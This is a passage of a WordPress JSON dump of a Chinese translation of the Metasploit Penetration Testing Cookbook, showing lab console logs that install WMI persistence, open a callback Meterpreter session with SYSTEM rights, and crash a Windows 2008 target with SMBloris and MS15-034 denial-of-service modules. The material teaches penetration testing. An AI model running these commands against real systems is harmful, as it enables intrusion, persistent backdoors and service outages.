                                                                                                    17. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      .....<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    18. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      meterpreter<\/span> ><\/span> migrate<\/span> -N<\/span> explorer.exe<\/span> \/\/\u8fdb\u7a0b\u8fc1\u79fb\u4e0d\u4e00\u5b9a\u6bcf\u6b21\u90fd\u80fd\u6210\u529f\uff0c\u53ef\u4ee5\u591a\u8bd5\u51e0\u6b21<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    19. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      [*<\/span>] Migrating<\/span> from<\/span> 1088 <\/span>to<\/span> 5624<\/span>...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    20. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      [*<\/span>] Migration<\/span> completed<\/span> successfully.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    21. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                    22. \n
                                                                                                      \n
                                                                                                      <\/div>\n<\/div>\n
                                                                                                      \n
                                                                                                      \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                      <\/code><\/pre>\n
                                                                                                      \u7136\u540e\u518d\u6b21\u653b\u51fb<\/p>\n
                                                                                                      <\/code><\/pre>\n
                                                                                                        \n
                                                                                                      1. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        meterpreter > background<\/div>\n<\/div>\n<\/li>\n
                                                                                                      2. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [*] Backgrounding session 1.<\/span>..<\/div>\n<\/div>\n<\/li>\n
                                                                                                      3. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        msf5 exploit(windows\/local\/<\/span>wmi_persistence) > exploit<\/div>\n<\/div>\n<\/li>\n
                                                                                                      4. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n<\/li>\n
                                                                                                      5. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [*] Installing Persistence...<\/div>\n<\/div>\n<\/li>\n
                                                                                                      6. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [+] - Bytes remaining:<\/span> 12560<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                      7. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [+] - Bytes remaining:<\/span> 4560<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                      8. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [+] Payload successfully staged.<\/div>\n<\/div>\n<\/li>\n
                                                                                                      9. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [+] Persistence installed! Call a shell using \"smbclient \\\\\\\\192.168.177.144\\\\C$ -U Administrator <arbitrary password>\"<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                      10. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        [*] Clean up Meterpreter RC file:<\/span> \/root\/<\/span>.msf4\/logs\/<\/span>wmi_persistence\/192.168.177.144_20190428.2114\/<\/span>192.168<\/span>.177<\/span>.144<\/span>_20190428.2114<\/span>.rc<\/div>\n<\/div>\n<\/li>\n
                                                                                                      11. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        msf5 exploit(windows\/local\/<\/span>wmi_persistence) ><\/div>\n<\/div>\n<\/li>\n
                                                                                                      12. \n
                                                                                                        \n
                                                                                                        <\/div>\n<\/div>\n
                                                                                                        \n
                                                                                                        \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                        <\/code><\/pre>\n
                                                                                                        \u6ce8\u9500\u76ee\u6807\u673a\u767b\u5f55\uff0c\u7136\u540e\u91cd\u65b0\u767b\u5f55\uff0cmsfconsole<\/code>\u8fd9\u8fb9\u5c31\u4f1a\u63a5\u6536\u5230\u56de\u8fde\u7684\u4f1a\u8bdd<\/p>\n
                                                                                                        <\/code><\/pre>\n
                                                                                                          \n
                                                                                                        1. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          [*<\/span>] Meterpreter<\/span> session<\/span> 2<\/span> opened<\/span> (192.168.177.143:4433<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:49437)<\/span> at<\/span> 2019-04-28 12:27:54<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        2. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                                                        3. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          msf5<\/span> exploit(multi\/handler)<\/span> ><\/span> sessions<\/span> -i<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        4. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          [*<\/span>] Starting<\/span> interaction<\/span> with<\/span> 2<\/span>...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        5. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                                                        6. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          meterpreter<\/span> ><\/span> getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        7. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          Server username:<\/span> NT<\/span> AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        8. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          meterpreter<\/span> ><\/span> sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        9. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          Computer :<\/span> METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        10. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          OS :<\/span> Windows<\/span> 2008 <\/span>R2<\/span> (Build<\/span> 7601<\/span>,<\/span> Service<\/span> Pack<\/span> 1<\/span>).<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        11. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          Architecture :<\/span> x64<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        12. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          System Language :<\/span> en_US<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        13. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          Domain :<\/span> WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        14. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          Logged On Users :<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        15. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          Meterpreter :<\/span> x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        16. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                        17. \n
                                                                                                          \n
                                                                                                          <\/div>\n<\/div>\n
                                                                                                          \n
                                                                                                          \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                          <\/code><\/pre>\n
                                                                                                          9\u3001\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/h4>\n
                                                                                                          \u62d2\u7edd\u670d\u52a1\u653b\u51fb\u901a\u5e38\u662f\u901a\u8fc7\u5411\u76ee\u6807\u673a\u8bf7\u6c42\u5927\u91cf\u7684\u8d44\u6e90\u6216\u5229\u7528\u6f0f\u6d1e\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u6d88\u8017\u76ee\u6807\u673a\u5668\u6027\u80fd\uff0c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u4f1a\u5bfc\u81f4\u5408\u6cd5\u7528\u6237\u65e0\u6cd5\u8bbf\u95ee\u8ba1\u7b97\u673a\u670d\u52a1\u6216\u8d44\u6e90\uff0c\u751a\u81f3\u53ef\u80fd\u4f1a\u5bfc\u81f4\u670d\u52a1\u6216\u64cd\u4f5c\u7cfb\u7edf\u5d29\u6e83\u3002<\/p>\n
                                                                                                          \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                                                                                          SMBloris<\/code>\u662f\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u4e8620<\/code>\u00a0\u5e74\u7684\u00a0Windows SMB<\/code>\u00a0\u6f0f\u6d1e\uff0c\u6b64\u6f0f\u6d1e\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb(\u00a0DoS<\/code>\u00a0) , \u4f7f\u5f97\u5927\u89c4\u6a21\u670d\u52a1\u5668\u762b\u75ea\u3002\u5f71\u54cd\u6240\u6709\u7248\u672c\u7684\u00a0SMB<\/code>\u00a0\u534f\u8bae\u4ee5\u53ca\u6240\u6709Windows 2000<\/code>\u00a0\u4e4b\u540e\u7684\u7cfb\u7edf\u7248\u672c\u3002<\/p>\n
                                                                                                          \u600e\u4e48\u505a<\/h5>\n
                                                                                                          1\u3001\u5728\u8fdb\u884cSMBloris<\/code>\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u4e4b\u524d\uff0c\u8981\u5148\u8bbe\u7f6e\u653b\u51fb\u673a\u7684\u6700\u5927\u8fde\u63a5\u6570\u3002<\/p>\n
                                                                                                          <\/code><\/pre>\n
                                                                                                            \n
                                                                                                          1. \n
                                                                                                            \n
                                                                                                            <\/div>\n<\/div>\n
                                                                                                            \n
                                                                                                            root@osboxes:~<\/span># ulimit -n 65535<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                          2. \n
                                                                                                            \n
                                                                                                            <\/div>\n<\/div>\n
                                                                                                            \n
                                                                                                            root@osboxes:~<\/span># ulimit -n<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                          3. \n
                                                                                                            \n
                                                                                                            <\/div>\n<\/div>\n
                                                                                                            \n
                                                                                                            65535<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                          4. \n
                                                                                                            \n
                                                                                                            <\/div>\n<\/div>\n
                                                                                                            \n
                                                                                                            root@osboxes:~<\/span>#<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                          5. \n
                                                                                                            \n
                                                                                                            <\/div>\n<\/div>\n
                                                                                                            \n
                                                                                                            \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                            <\/code><\/pre>\n
                                                                                                            2\u3001\u7136\u540e\u4f7f\u7528smb_loris<\/code>\u6a21\u5757\u6765\u653b\u51fb\u76ee\u6807\u673a\u673a\u5668<\/p>\n
                                                                                                            <\/code><\/pre>\n
                                                                                                              \n
                                                                                                            1. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              msf5<\/span> auxiliary(dos\/smb\/smb_loris)<\/span> ><\/span> set<\/span> RHOST<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            2. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              RHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            3. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              msf5<\/span> auxiliary(dos\/smb\/smb_loris)<\/span> ><\/span> run<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            4. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n<\/li>\n
                                                                                                            5. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] Starting<\/span> server...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            6. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 100<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            7. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 200<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            8. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 300<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            9. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 400<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            10. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 500<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            11. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 600<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            12. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 700<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            13. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 800<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            14. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 900<\/span> socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            15. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 1000 <\/span>socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            16. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [!]<\/span> 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> At<\/span> open<\/span> socket<\/span> limit<\/span> with<\/span> 1017 <\/span>sockets<\/span> open.<\/span> Try<\/span> increasing<\/span> you<\/span> system<\/span> limits.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            17. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> 1017 <\/span>socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            18. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Holding<\/span> steady<\/span> at<\/span> 1017 <\/span>socket(s)<\/span> open<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                            19. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n<\/li>\n
                                                                                                            20. \n
                                                                                                              \n
                                                                                                              <\/div>\n<\/div>\n
                                                                                                              \n
                                                                                                              \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                              <\/code><\/pre>\n
                                                                                                              3\u3001\u67e5\u770b\u76ee\u6807\u673a\u5668\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u7531\u4e8e\u653b\u51fb\u8005\u53d1\u9001\u4e86\u5927\u91cf\u7684SMB<\/code>\u8bf7\u6c42\u6d88\u8017\u4e86\u76ee\u6807\u673a\u7684\u5927\u91cf\u5185\u5b58\u3002\u6bcf\u4e00\u4e2a\u00a0NBSS<\/code>\u00a0\u8fde\u63a5\u53ef\u4ee5\u7533\u8bf7\u5206\u914d\u00a0128 KB<\/code>\u00a0\u5185\u5b58\u7a7a\u95f4\uff0c\u5728\u5efa\u7acb\u5927\u91cf\u8fde\u63a5\u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u8017\u5c3d\u5185\u5b58\uff0c\u8fbe\u5230\u62d2\u7edd\u670d\u52a1\u7684\u6548\u679c\u3002<\/p>\n
                                                                                                              <\/figcaption><\/figure>\n
                                                                                                              \u53e6\u4e00\u4e2a\u53ef\u6015\u7684DoS<\/code>\u653b\u51fb\u662fMS15-034<\/code>HTTP\u534f\u8bae\u6808\u8bf7\u6c42\u5904\u7406\u62d2\u7edd\u670d\u52a1\u3002<\/p>\n
                                                                                                              \u5982\u679cMicrosoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012<\/code>\u673a\u5668\u6b63\u5728\u8fd0\u884c\u4e86\u5b58\u5728MS15-034<\/code>\u6f0f\u6d1e\u7684IIS<\/code>\u670d\u52a1\uff0c\u90a3\u4e48\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5bfc\u81f4\u76ee\u6807\u670d\u52a1\u5668\u5d29\u6e83\u3002<\/p>\n
                                                                                                              <\/code><\/pre>\n
                                                                                                                \n
                                                                                                              1. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                msf5<\/span> ><\/span> use<\/span> auxiliary\/dos\/http\/ms15_034_ulonglongadd<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              2. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                msf5<\/span> auxiliary(dos\/http\/ms15_034_ulonglongadd)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              3. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              4. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                msf5<\/span> auxiliary(dos\/http\/ms15_034_ulonglongadd)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              5. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n<\/li>\n
                                                                                                              6. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                [*<\/span>] DOS<\/span> request<\/span> sent<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              7. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                [*<\/span>] Scanned<\/span> 1<\/span> of<\/span> 1<\/span> hosts<\/span> (100%<\/span> complete)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              8. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                [*<\/span>] Auxiliary<\/span> module<\/span> execution<\/span> completed<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              9. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                msf5<\/span> auxiliary(dos\/http\/ms15_034_ulonglongadd)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                                              10. \n
                                                                                                                \n
                                                                                                                <\/div>\n<\/div>\n
                                                                                                                \n
                                                                                                                \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                                                <\/code><\/pre>\n
                                                                                                                <\/figcaption><\/figure>\n
                                                                                                                \u53ef\u4ee5\u770b\u5230\uff0c\u76ee\u6807\u6b7b\u673a\u84dd\u5c4f\u4e86\u3002<\/p>\n
                                                                                                                \u76f8\u5173\u5b9e\u9a8c\u5728\u7ebf\u5b66\u4e60<\/h4>\n
                                                                                                                Metasploit\u653b\u51fblinux\u5b9e\u4f8b<\/p>\n
                                                                                                                Metasploit\u653b\u51fbwinserver2008\u5b9e\u4f8b<\/p>\n
                                                                                                                <\/a><\/a>\u7b2c\u56db\u7ae0 Meterpreter \uff08\u9884\u544a\uff09<\/h3>\n
                                                                                                                \u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u5b66\u4e60\u4ee5\u4e0b\u5185\u5bb9\uff1a<\/p>\n
                                                                                                                1\u3001\u4e86\u89e3Meterpreter\u6838\u5fc3\u547d\u4ee4<\/p>\n
                                                                                                                2\u3001\u4e86\u89e3Meterpreter\u6587\u4ef6\u7cfb\u7edf\u547d\u4ee4<\/p>\n
                                                                                                                3\u3001\u4e86\u89e3Meterpreter\u7f51\u7edc\u547d\u4ee4<\/p>\n
                                                                                                                4\u3001\u4e86\u89e3Meterpreter\u7cfb\u7edf\u547d\u4ee4<\/p>\n
                                                                                                                5\u3001\u4e0e\u76ee\u6807\u5efa\u7acb\u591a\u91cd\u901a\u4fe1\u4fe1\u9053<\/p>\n
                                                                                                                6\u3001Meterpreter\u53cd\u53d6\u8bc1<\/p>\n
                                                                                                                7\u3001\u5c4f\u5e55\u548c\u952e\u76d8\u76d1\u542c<\/p>\n
                                                                                                                8\u3001\u4f7f\u7528 scraper Merterpreter\u811a\u672c<\/p>\n
                                                                                                                9\u3001\u4f7f\u7528 winenum \u679a\u4e3e\u7cfb\u7edf\u4fe1\u606f<\/p>\n
                                                                                                                10\u3001\u81ea\u52a8\u5316\u811a\u672c<\/p>\n
                                                                                                                11\u3001Meterpreter\u8d44\u6e90\u811a\u672c<\/p>\n
                                                                                                                12\u3001Meterpreter\u8d85\u65f6\u63a7\u5236<\/p>\n
                                                                                                                13\u3001Meterpreter\u4f11\u7720\u63a7\u5236<\/p>\n
                                                                                                                14\u3001Meterpreter\u4f20\u8f93<\/p>\n
                                                                                                                15\u3001\u6ce8\u518c\u8868\u64cd\u4f5c<\/p>\n
                                                                                                                16\u3001\u52a0\u8f7d\u6846\u67b6\u63d2\u4ef6<\/p>\n
                                                                                                                17\u3001API\u548cMixins<\/p>\n
                                                                                                                18\u3001Railgun\u2014\u2014\u5c06Ruby\u8f6c\u6362\u4e3a\u6b66\u5668<\/p>\n
                                                                                                                19\u3001\u5411Railgun\u4e2d\u6dfb\u52a0DLL\u548c\u51fd\u6570\u5b9a\u4e49<\/p>\n
                                                                                                                20\u3001\u52ab\u6301\u8fdc\u7a0bVNC<\/p>\n
                                                                                                                21\u3001\u5f00\u542f\u8fdc\u7a0b\u684c\u9762<\/p>\n
                                                                                                                <\/a><\/a>\u8bf4\u660e<\/h3>\n
                                                                                                                \u539f\u4e66\uff1a\u300aMetasploit Penetration Testing Cookbook - Third Edition\u300b<\/p>\n
                                                                                                                www.packtpub.com\/networking-\u2026<\/a><\/p>\n
                                                                                                                \u672c\u6587\u7531\u6cd3\u6e90\u89c6\u91ce\u7ffb\u8bd1\uff0c\u8f6c\u8f7d\u8bf7\u6ce8\u660e\u6765\u6e90\u3002<\/p>\n
                                                                                                                 <\/p>\n
                                                                                                                \u771f\u5b9e\u73af\u5883\uff0c\u5728\u7ebf\u5b9e\u64cd\u5b66\u7f51\u7edc\u5b89\u5168 \uff1b \u5b9e\u9a8c\u5185\u5bb9\u6db5\u76d6\uff1a\u7cfb\u7edf\u5b89\u5168\uff0c\u8f6f\u4ef6\u5b89\u5168\uff0c\u7f51\u7edc\u5b89\u5168\uff0cWeb\u5b89\u5168\uff0c\u79fb\u52a8\u5b89\u5168\uff0cCTF\uff0c\u53d6\u8bc1\u5206\u6790\uff0c\u6e17\u900f\u6d4b\u8bd5\uff0c\u7f51\u5b89\u610f\u8bc6\u6559\u80b2\u7b49\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
                                                                                                                \u7b2c\u4e09\u7ae0 \u670d\u52a1\u7aef\u6f0f\u6d1e\u5229\u7528 \u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u5b66\u4e60\u4ee5\u4e0b\u5185\u5bb9 1\u3001\u653b\u51fbLinux\u670d\u52a1\u5668 2\u3001SQL\u6ce8\u5165\u653b\u51fb 3\u3001she […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-491","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/491","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=491"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/491\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=491"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=491"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=491"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}